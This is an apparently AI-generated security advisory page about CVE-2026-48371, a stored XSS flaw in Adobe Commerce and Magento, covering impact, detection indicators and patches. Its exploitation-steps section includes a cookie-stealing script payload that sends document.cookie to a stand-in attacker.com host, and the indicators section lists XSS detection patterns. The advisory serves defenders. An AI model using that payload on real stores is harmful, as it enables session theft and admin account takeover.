Register for the AI for Security Summit: Join Figma, Perplexity & Wiz

CVE-2026-48371
Adobe Commerce vulnerability analysis and mitigation

Overview

CVE-2026-48371 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce, Adobe Commerce B2B, and Magento Open Source that allows a low-privileged authenticated attacker to inject malicious scripts into vulnerable form fields. When a victim browses to the page containing the compromised field, the malicious JavaScript executes in their browser. Affected versions include Adobe Commerce up to 2.4.9/2.4.8-p5/2.4.7-p10/2.4.6-p15/2.4.5-p17/2.4.4-p18, Adobe Commerce B2B up to 1.5.3/1.5.2-p5/1.4.2-p10/1.3.4-p17/1.3.3-p18, Magento Open Source up to 2.4.9/2.4.8-p5/2.4.7-p10/2.4.6-p15, and the Adobe Commerce Webhooks Plugin up to version 1.20.0. The vulnerability was published on July 14, 2026, and carries a CVSS v3.1 base score of 5.4 (Medium) (GitHub Advisory, Adobe Advisory).

Technical details

The root cause is improper neutralization of user-controllable input before it is placed in output rendered as a web page, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). An attacker with low-level authenticated access can submit malicious JavaScript payloads into vulnerable form fields within the Adobe Commerce or Magento admin/storefront interface; the application fails to sanitize or encode this input before storing and subsequently rendering it to other users. Exploitation requires user interaction — a victim must navigate to the page containing the injected field — and the scope is marked as changed, meaning the injected script can affect resources beyond the vulnerable component's security boundary (GitHub Advisory, Adobe Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views the page containing the injected field, including administrators. This can lead to session cookie theft, credential harvesting, forged requests on behalf of the victim (CSRF-like actions), and defacement of the application interface. While availability is not directly impacted, the confidentiality and integrity risks are meaningful — particularly if an administrator account is targeted, potentially enabling privilege escalation or further compromise of the Commerce platform (GitHub Advisory).

Exploitability

As of the time of disclosure, there is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation (GitHub Advisory). The EPSS score is approximately 0.18–0.29%, indicating a low near-term probability of exploitation. No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires a low-privileged authenticated account and victim interaction, which somewhat limits the attack surface compared to unauthenticated vulnerabilities.

Exploitation steps

  1. Reconnaissance: Identify a target Adobe Commerce or Magento Open Source instance running a vulnerable version (e.g., ≤2.4.9, ≤2.4.8-p5, ≤2.4.7-p10, ≤2.4.6-p15). Confirm the version via publicly accessible metadata or error pages.
  2. Obtain low-privileged access: Register or use an existing low-privileged account (e.g., a customer account or restricted admin account) on the target Commerce instance.
  3. Identify vulnerable form fields: Navigate through the application to locate form fields that accept and store user input which is later rendered to other users (e.g., product reviews, customer profile fields, B2B company fields, or admin-facing input areas).
  4. Inject XSS payload: Submit a stored XSS payload into the vulnerable field, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent obfuscated variant.
  5. Trigger victim execution: Wait for or socially engineer a higher-privileged user (e.g., an administrator) to browse to the page rendering the injected field. The malicious JavaScript executes in the victim's browser context.
  6. Harvest results: Collect stolen session cookies, credentials, or other sensitive data from the attacker-controlled server, then use them to escalate access or perform unauthorized actions (GitHub Advisory, Adobe Advisory).

Indicators of compromise

  • Logs: Web server or application access logs showing unusual input containing HTML/JavaScript tags (e.g., <script>, onerror=, javascript:) submitted to form endpoints; repeated access to pages containing stored user input by different user accounts in short succession.
  • Network: Outbound HTTP/HTTPS requests from victim browsers to unexpected external domains shortly after viewing Commerce pages; DNS queries to attacker-controlled domains originating from admin workstations.
  • Application: Unexpected or garbled content appearing in product reviews, customer profiles, B2B company fields, or other user-editable areas of the Commerce storefront or admin panel.
  • Browser/Session: Unexplained session invalidations or admin account activity occurring from IP addresses inconsistent with normal administrator locations, potentially indicating session hijacking via stolen cookies.

Mitigation and workarounds

Adobe has released patched versions addressing this vulnerability. Users should upgrade to the July 2026 security releases: Adobe Commerce 2.4.9-2026-jul, 2.4.8-2026-jul, 2.4.7-2026-jul, 2.4.6-2026-jul, 2.4.5-2026-jul, or 2.4.4-2026-jul; Adobe Commerce B2B 1.5.3-2026-jul, 1.5.2-2026-jul, 1.4.2-2026-jul, 1.3.4-2026-jul, or 1.3.3-2026-jul; Magento Open Source 2.4.9-2026-jul, 2.4.8-2026-jul, 2.4.7-2026-jul, or 2.4.6-2026-jul; and Adobe Commerce Webhooks Plugin 1.21.0. As interim mitigations, organizations should implement a Web Application Firewall (WAF) with XSS detection rules, enforce strict input validation and output encoding on all form fields, and restrict low-privileged user access to sensitive input areas where possible (Adobe Advisory, GitHub Advisory).

Additional resources


SourceThis report was generated using AI

Related Adobe Commerce vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77111HIGH8.7
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoSep 08, 2026
CVE-2026-77774HIGH8.6
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoSep 08, 2026
CVE-2026-77109HIGH8.6
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoSep 08, 2026
CVE-2026-77110HIGH7.6
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoSep 08, 2026
CVE-2026-77108HIGH7.5
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoSep 08, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management